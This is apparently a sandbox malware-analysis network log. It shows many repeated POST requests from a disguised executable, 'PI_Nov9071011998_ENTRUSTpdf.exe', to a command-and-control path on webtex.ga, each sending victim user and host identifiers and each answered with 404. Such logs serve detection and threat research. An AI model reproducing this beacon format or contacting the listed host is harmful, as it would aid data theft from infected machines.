                                    Dec 3, 2020 10:03:19.879013062 CET1295OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:19.897239923 CET1295OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:19.953104973 CET1300INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:37 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    131192.168.2.34986547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:20.167098045 CET1307OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:20.187146902 CET1307OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:20.230772972 CET1308INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:37 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    132192.168.2.34986647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:20.635796070 CET1309OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:20.657254934 CET1309OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:20.702594995 CET1309INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:37 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    133192.168.2.34986747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:20.914107084 CET1310OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:20.933341980 CET1310OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:20.975845098 CET1311INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:38 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    134192.168.2.34986847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:21.409024954 CET1311OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:21.427589893 CET1312OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:21.474462986 CET1312INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:38 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    135192.168.2.34986947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:21.989440918 CET1313OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:22.008724928 CET1313OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:22.047095060 CET1313INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:39 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    136192.168.2.34987047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:22.262478113 CET1314OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:22.279279947 CET1314OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:22.321959019 CET1315INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:39 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    137192.168.2.34987147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:22.758574009 CET1318OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:22.775207996 CET1318OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:22.823090076 CET1320INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:40 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    138192.168.2.34987247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:23.023041964 CET1322OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:23.039750099 CET1322OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:23.081216097 CET1323INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:40 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    139192.168.2.34987347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:23.528398037 CET1328OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:23.545073986 CET1329OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:23.585988998 CET1330INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:40 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    14192.168.2.34972347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:34.056226015 CET83OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:34.072757959 CET84OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:34.116974115 CET84INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:51 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    140192.168.2.34987447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:24.023586035 CET1335OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:24.040232897 CET1336OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:24.206701040 CET1338INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:41 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    141192.168.2.34988047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:24.680366993 CET1360OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:24.696995974 CET1362OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:24.744697094 CET1364INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:41 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    142192.168.2.34988147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:25.184133053 CET4165OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:25.200767994 CET4165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:25.245220900 CET4165INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:42 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    143192.168.2.34988247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:25.660223007 CET4166OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:25.676928043 CET4167OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:25.718343019 CET4167INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:42 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    144192.168.2.34988347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:26.190090895 CET4168OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:26.206758022 CET4168OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:26.256450891 CET4168INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:43 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    145192.168.2.34988447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:26.801023960 CET4169OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:26.817636013 CET4169OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:26.861567974 CET4170INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:44 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    146192.168.2.34988547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:27.069096088 CET4170OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:27.086309910 CET4171OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:27.127991915 CET4171INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:44 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    147192.168.2.34988647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:27.591078997 CET4172OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:27.607764006 CET4172OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:27.649519920 CET4172INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:44 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    148192.168.2.34988747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:28.103034019 CET4659OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
